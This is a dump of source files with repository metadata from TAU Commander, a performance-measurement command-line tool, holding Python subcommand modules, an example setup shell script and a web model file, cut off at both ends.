`num` bytes in human readable format\n \"\"\"\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n" }, { "alpha_fraction": 0.6348122954368591, "alphanum_fraction": 0.6369678378105164, "avg_line_length": 33.36419677734375, "blob_id": "de2ecf285ab3506384fbbaddd5034ba433013284", "content_id": "72b46551d31b7c0bc5a4fb26c27cb9b66d344d99", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5567, "license_type": "permissive", "max_line_length": 105, "num_lines": 162, "path": "/packages/tau/__main__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\n\n# TAU modules\nimport tau\nimport commands\nimport logger\nimport util\nimport arguments as args\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"TAU Commander [ %s ]\" % tau.PROJECT_URL\n\nCOMMAND = 'tau'\n\nUSAGE = \"\"\"\n %(command)s [arguments] <subcommand> [options]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\nHints:\n - All parameters can be specified partially e.g. 
these all do the same thing:\n     tau target create my_new_target --device_arch=GPU\n     tau targ cre my_new_target --device=GPU\n     tau t c my_new_target --d=GPU\n\"\"\" % {'command': COMMAND}\n\nUSAGE_EPILOG = \"\"\"\n%(command_descr)s\n\nshortcuts:\n  tau <compiler>     Execute a compiler command \n                     - Example: tau gcc *.c -o a.out\n                     - Alias for 'tau build <compiler>'\n  tau <program>      Gather data from a program\n                     - Example: tau ./a.out\n                     - Alias for 'tau trial create <program>'\n  tau run <program>  Gather data from a program\n                     - Example: tau ./a.out\n                     - Alias for 'tau trial create <program>'\n  tau show           Show data from the most recent trial \n                     - An alias for 'tau trial show'\n\nSee 'tau help <subcommand>' for more information on <subcommand>.\n\"\"\" % {'command_descr': commands.getCommandsHelp()}\n\n_arguments = [ (('command',), {'help': \"See subcommand descriptions below\",\n                               'metavar': '<subcommand>'}),\n               (('options',), {'help': \"Options to be passed to <subcommand>\",\n                               'metavar': '[options]',\n                               'nargs': args.REMAINDER}),\n               (('-v', '--verbose'), {'help': \"Set logging level to DEBUG\",\n                                      'metavar': '', \n                                      'const': 'DEBUG', \n                                      'default': 'INFO', \n                                      'action': 'store_const'})]\nPARSER = args.getParser(_arguments,\n                        prog=COMMAND, \n                        usage=USAGE, \n                        description=SHORT_DESCRIPTION,\n                        epilog=USAGE_EPILOG)\n\n\ndef getUsage():\n    return PARSER.format_help()\n\ndef getHelp():\n    return HELP\n\n\ndef main():\n    \"\"\"\n    Program entry point\n    \"\"\" \n\n    # Check Python version\n    if sys.version_info < tau.MINIMUM_PYTHON_VERSION:\n        version = '.'.join(map(str, sys.version_info[0:3]))\n        expected = '.'.join(map(str, tau.MINIMUM_PYTHON_VERSION))\n        LOGGER.error(\"Your Python version is %s but Python %s or later is required. Please update Python.\" % \n                     (version, expected))\n\n    args = PARSER.parse_args()\n    cmd = args.command\n    cmd_args = args.options\n\n    # Set verbosity level\n    logger.setLogLevel(args.verbose)\n    LOGGER.debug('Arguments: %s' % args)\n    LOGGER.debug('Verbosity level: %s' % logger.LOG_LEVEL)\n    \n    # Try to execute as a TAU command\n    try:\n        return commands.executeCommand([cmd], cmd_args)\n    except commands.UnknownCommandError:\n        pass\n\n    # Check shortcuts\n    shortcut = None\n    if commands.build.isCompatible(cmd):\n        shortcut = ['build']\n        cmd_args = [cmd] + cmd_args\n    elif commands.trial.create.isCompatible(cmd):\n        shortcut = ['trial', 'create']\n        cmd_args = [cmd] + cmd_args\n    elif cmd == 'run' and commands.build.isCompatible(cmd):\n        shortcut = ['build']\n    elif cmd == 'show':\n        shortcut = ['trial', 'show']\n    if shortcut:\n        LOGGER.debug('Trying shortcut: %s' % shortcut)\n        return commands.executeCommand(shortcut, cmd_args)\n    else:\n        LOGGER.debug('No shortcut found for %r' % cmd)\n\n    # Not sure what to do at this point, so advise the user and exit\n    LOGGER.info(\"Unknown command. 
Calling 'tau help %s' to get advice.\" % cmd)\n return commands.executeCommand(['help'], [cmd])\n \n# Command line execution\nif __name__ == \"__main__\":\n exit(main())\n" }, { "alpha_fraction": 0.6801389455795288, "alphanum_fraction": 0.6832965016365051, "avg_line_length": 31.316326141357422, "blob_id": "bd3bdeaa643f7e6a1d41c16c2a626065d0b1ebdb", "content_id": "7471fcc1d8b55babb459596b7adf9e812554f581", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3167, "license_type": "permissive", "max_line_length": 80, "num_lines": 98, "path": "/packages/tau/commands/target/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport arguments as args\n\n\nLOGGER = logger.getLogger(__name__)\n\n_name_parts = __name__.split('.')[1:]\nCOMMAND = ' '.join(['tau'] + _name_parts)\n\nSHORT_DESCRIPTION = \"Create and manage target configurations.\"\n\nGROUP = \"configuration\"\n\nUSAGE = \"\"\"\n %(command)s <subcommand> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nUSAGE_EPILOG = \"\"\"\n%(command_descr)s\n\nSee '%(command)s <subcommand> --help' for more information on <subcommand>.\n\"\"\" % {'command': COMMAND,\n       'command_descr': commands.getCommandsHelp(__name__)}\n\n\n\n_arguments = [ (('subcommand',), {'help': \"See 'subcommands' below\",\n                                  'metavar': '<subcommand>'}),\n               (('options',), {'help': \"Arguments to be passed to <subcommand>\",\n                               'metavar': '[arguments]',\n                               'nargs': args.REMAINDER})]\nPARSER = args.getParser(_arguments,\n                        prog=COMMAND, \n                        usage=USAGE, \n                        description=SHORT_DESCRIPTION,\n                        epilog=USAGE_EPILOG)\n\ndef getUsage():\n    return PARSER.format_help() \n\n\ndef getHelp():\n    return HELP\n\n\ndef main(argv):\n    \"\"\"\n    Program entry point\n    \"\"\"\n    args = PARSER.parse_args(args=argv)\n    LOGGER.debug('Arguments: %s' % args)\n    \n    subcommand = args.subcommand\n    options = args.options\n    return commands.executeCommand(_name_parts + [subcommand], options)\n" }, { "alpha_fraction": 0.711796224117279, "alphanum_fraction": 0.7171581983566284, "avg_line_length": 23.064516067504883, "blob_id": "66f97eefe969c45d36bbfb1ac88a880fe8137898", "content_id": "387b6b4bb96fb51fcec30bbcaa1c0a4ae16a4d92", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 746, "license_type": "permissive", "max_line_length": 57, "num_lines": 31, "path": "/examples/mm/configure.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif ! which tau >/dev/null 2>&1 ; then\n    echo \"ERROR: 'tau' not found in PATH\"\n    exit 1\nfi\n\n# Show commands as executed\nset -x\n\n# Example targets\ntarget_name=\"ex-`echo $HOSTNAME | cut -d. 
-f1`\"\ntau target create \"$target_name\"\n\n# Example applications\ntau application create \"ex-mm-serial\"\ntau application create \"ex-mm-openmp\" --openmp\ntau application create \"ex-mm-openmp-mpi\" --openmp --mpi\n\n# Example measurements\ntau measurement create \"ex-profile\"\ntau measurement create \"ex-trace\" --profile=F --trace=T\ntau measurement create \"ex-sample\" --profile=F --sample=T\n\n# Set up example project \ntau project create \"ex-mm\" \\\n $target_name \\\n ex-mm-serial ex-mm-openmp ex-mm-openmp-mpi \\\n ex-profile ex-trace ex-sample\n\ntau dashboard\n" }, { "alpha_fraction": 0.6181294322013855, "alphanum_fraction": 0.6203457713127136, "avg_line_length": 31.934307098388672, "blob_id": "890e60c290f7722f3008fa8a188e4005cff72259", "content_id": "64073472ad2473cd7d8c432dbe3a70c87216bd54", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4512, "license_type": "permissive", "max_line_length": 84, "num_lines": 137, "path": "/packages/tau/commands/target/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List target configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [target_name] [target_name] ... 
[arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show only targets with this name\",\n 'metavar': 'target_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the target\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Target.all()\n else:\n found = []\n for name in names:\n t = Target.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No target configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Targets (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No targets. See 'tau target create --help'\"\n else:\n table = Texttable(logger.LINE_WIDTH)\n cols = [('Name', 'r', 'name'), \n ('Host OS', 'c', 'host_os'), \n ('Host Arch.', 'c', 'host_arch'), \n ('Device Arch.', 'c', 'device_arch'),\n ('C', 'l', 'CC'),\n ('C++', 'l', 'CXX'),\n ('Fortran', 'l', 'FC'),\n ('In Projects', 'l', None)]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if args.long:\n parts = []\n for t in found:\n populated = t.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for t in found:\n populated = t.populate()\n projects = ', '.join([p['name'] for p in populated['projects']])\n row = [populated.get(attr, '') for _, _, attr in cols if attr] + [projects]\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6297292709350586, "alphanum_fraction": 0.6318809390068054, "avg_line_length": 33.214725494384766, "blob_id": "9d2c720b591178dda65d7bbf9e12e517e8fbaf9f", "content_id": "d1c9843ccddfe398e166037b80924952d993cec0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "permissive", "max_line_length": 80, "num_lines": 163, "path": "/packages/tau/commands/project/create.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\n\n# TAU modules\nimport logger\nimport arguments as args\nimport commands\nimport controller\nfrom model.project import Project\nfrom model.target import Target\nfrom model.application import Application\nfrom model.measurement import Measurement\n\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Create a new project configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <project_name> [targets] [applications] [measurements] [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Project,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\nPARSER.add_argument('impl_targets', \n help=\"Target configurations in this project\",\n metavar='[targets]', \n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_applications', \n help=\"Application configurations in this project\",\n metavar='[applications]', \n nargs='*', \n default=args.SUPPRESS)\nPARSER.add_argument('impl_measurements', \n help=\"Measurement configurations in this project\",\n metavar='[measurements]',\n nargs='*',\n default=args.SUPPRESS) \nPARSER.add_argument('--targets',\n help=\"Target configurations in this project\",\n metavar='t',\n nargs='+',\n default=args.SUPPRESS)\nPARSER.add_argument('--applications', \n help=\"Application configurations in this project\",\n metavar='a',\n nargs='+',\n default=args.SUPPRESS)\nPARSER.add_argument('--measurements', \n help=\"Measurement configurations in this project\",\n metavar='m',\n nargs='+',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n targets = set()\n applications = set()\n measurements = set()\n \n for attr, model, dest in [('targets', Target, targets), \n ('applications', Application, applications), \n ('measurements', Measurement, measurements)]:\n for name in getattr(args, attr, []):\n found = model.withName(name)\n if not found:\n PARSER.error('There is no %s named %r' % (model.model_name, name))\n dest.add(found.eid)\n \n for name in getattr(args, 'impl_'+attr, []):\n t = Target.withName(name)\n a = Application.withName(name)\n m = Measurement.withName(name)\n tam = set([t,a,m]) - set([None])\n if len(tam) > 1:\n PARSER.error('%r is ambiguous, please use --targets, --applications,'\n ' or --measurements to specify 
configuration type' % name)\n elif len(tam) == 0:\n PARSER.error('%r is not a target, application, or measurement' % name)\n elif t:\n targets.add(t.eid)\n elif a:\n applications.add(a.eid)\n elif m:\n measurements.add(m.eid)\n \n try:\n delattr(args, 'impl_'+attr)\n except AttributeError:\n pass\n \n args.targets = list(targets)\n args.applications = list(applications)\n args.measurements = list(measurements)\n \n try:\n Project.create(args.__dict__)\n except controller.UniqueAttributeError:\n PARSER.error(\"A project named '%s' already exists.\" % args.name)\n \n LOGGER.info('Created a new project named %r.' % args.name)\n return commands.executeCommand(['project', 'list'], [args.name])\n" }, { "alpha_fraction": 0.7338039875030518, "alphanum_fraction": 0.7383720874786377, "avg_line_length": 32.44444274902344, "blob_id": "541404bd04a19fc25b2dec6af0aa5e2f6c9cb4cc", "content_id": "aa8149020ab153fc5c38c4766f68efdf1bcf8e96", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2408, "license_type": "permissive", "max_line_length": 79, "num_lines": 72, "path": "/packages/tau/environment.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\n\ndef getEnv(name):\n \"\"\"\n Gets the value of the environment variable named 'name' or fails\n \"\"\"\n try:\n return os.environ[name]\n except KeyError:\n sys.stderr.write(\"\"\"\n%(bar)s\n!\n! 
CRITICAL ERROR: %(name)s environment variable not set.\n!\n%(bar)s\n    \"\"\" % {'bar': '!'*80,\n           'name': name})\n    sys.exit(1)\n    \ndef base():\n    \"\"\"\n    The starting point for all subprocess command line arguments and environment\n    \"\"\"\n    return [], dict(os.environ)\n\n# TAU Commander home path\n__TAU_HOME__ = getEnv('__TAU_HOME__')\n\n# User-level TAU files\nUSER_PREFIX = os.path.join(os.path.expanduser('~'), '.tau')\n\n# System-level TAU files\nSYSTEM_PREFIX = os.path.realpath(os.path.join(__TAU_HOME__, '.system'))\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 11.25, "blob_id": "941015b7c43b41487fe964a16a369da1e54b0cd1", "content_id": "6fb6f2c1a797c10f7c4b8d2896bbcdf8526adc82", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "permissive", "max_line_length": 15, "num_lines": 4, "path": "/README.md", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "TAU Commander\n=============\n\nComing soon...\n\n" }, { "alpha_fraction": 0.709956705570221, "alphanum_fraction": 0.7130488753318787, "avg_line_length": 32.6875, "blob_id": "fcebbef18132153c8f3be2e9b29ec87123c7037a", "content_id": "07222a8ff57d9c79c8df0ef4ff836f091030ee13", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3234, "license_type": "permissive", "max_line_length": 122, "num_lines": 96, "path": "/packages/tau/commands/trial/delete.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n     this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n     this list of conditions and the following disclaimer in the documentation \n     and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n     be used to endorse or promote products derived from this software without \n     specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport error\nimport arguments as args\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Delete experiment trials.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <trial_number> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [ (('number',), {'help': \"Number of the trial to delete\",\n 'metavar': '<trial_number>'}) ]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE % {'command': COMMAND}, \n description=SHORT_DESCRIPTION)\n\ndef getUsage():\n return PARSER.format_help() \n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n raise error.ConfigurationError(\"No experiment configured.\", \"See `tau project select`\")\n\n try: \n number = int(args.number)\n except ValueError:\n PARSER.error(\"Invalid trial number: %s\" % args.number)\n fields = {'experiment': selection.eid, 'number': number}\n if not Trial.exists(fields):\n PARSER.error(\"No trial number %s in the current experiment. 
See `tau trial list` to see all trial numbers.\" % number)\n Trial.delete(fields)\n LOGGER.info('Deleted trial %s' % number)\n \n return commands.executeCommand(['trial', 'list'], [])\n" }, { "alpha_fraction": 0.5243342518806458, "alphanum_fraction": 0.5243342518806458, "avg_line_length": 14.768115997314453, "blob_id": "9844197de5b154a0aa8b48fd20614f17015f4c94", "content_id": "87af5b76989a8376f52f94f4d83380ab5a098fe9", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1089, "license_type": "permissive", "max_line_length": 108, "num_lines": 69, "path": "/commander/api/models/Measurement.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Measurement.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this measurement belongs to\n projects: {\n collection: 'Project',\n via: 'measurements'\n },\n\n // Target name\n name: {\n type: 'string',\n required: true\n },\n\n profile: {\n type: 'boolean',\n defaultsTo: true\n },\n\n trace: {\n type: 'boolean',\n defaultsTo: false\n },\n\n source_inst: {\n type: 'boolean',\n defaultsTo: true\n },\n\n // One of: [always, never, fallback]\n comp_inst: {\n type: 'string',\n defaultsTo: 'fallback'\n },\n\n sampling: {\n 